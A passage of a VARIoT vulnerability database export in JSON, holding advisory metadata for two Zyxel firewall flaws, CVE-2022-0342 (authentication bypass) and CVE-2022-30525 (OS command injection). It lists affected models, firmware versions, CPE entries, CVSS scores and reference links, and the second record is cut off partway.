            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. USG40 firmware, USG40W firmware, USG60 firmware etc. ZyXEL The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-0342"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-0342",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2022033003",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-0342",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0342"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ]
      },
      "id": "VAR-202203-1898",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.287857154
      },
      "last_update_date": "2023-12-18T14:04:01.403000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG/ZyWALL Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=187770"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/f1tao/awesome-iot-security-resource "
          },
          {
            "title": "BleepingComputer",
            "trust": 0.1,
            "url": "https://www.bleepingcomputer.com/news/security/zyxel-patches-critical-bug-affecting-firewall-and-vpn-devices/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.0
          },
          {
            "problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/support/zyxel-security-advisory-for-authentication-bypass-vulnerability-of-firewalls.shtml"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0342"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022033003"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-0342/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/287.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.bleepingcomputer.com/news/security/zyxel-patches-critical-bug-affecting-firewall-and-vpn-devices/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0342"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0342"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-03-28T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-0342"
          },
          {
            "date": "2023-07-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "date": "2022-03-28T13:15:07.747000",
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "date": "2022-03-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-04-04T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-0342"
          },
          {
            "date": "2023-07-14T08:38:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "date": "2022-04-04T17:27:58.343000",
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "date": "2022-04-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Product certification vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202205-0957

    Vulnerability from variot - Updated: 2023-12-18 13:59

    A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202205-0957",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 50w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "usg flex 700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg20w-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.30",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "jbaines-r7",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2022-30525",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2022-30525",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-30525",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-30525",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202205-3104",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-30525",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-30525"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
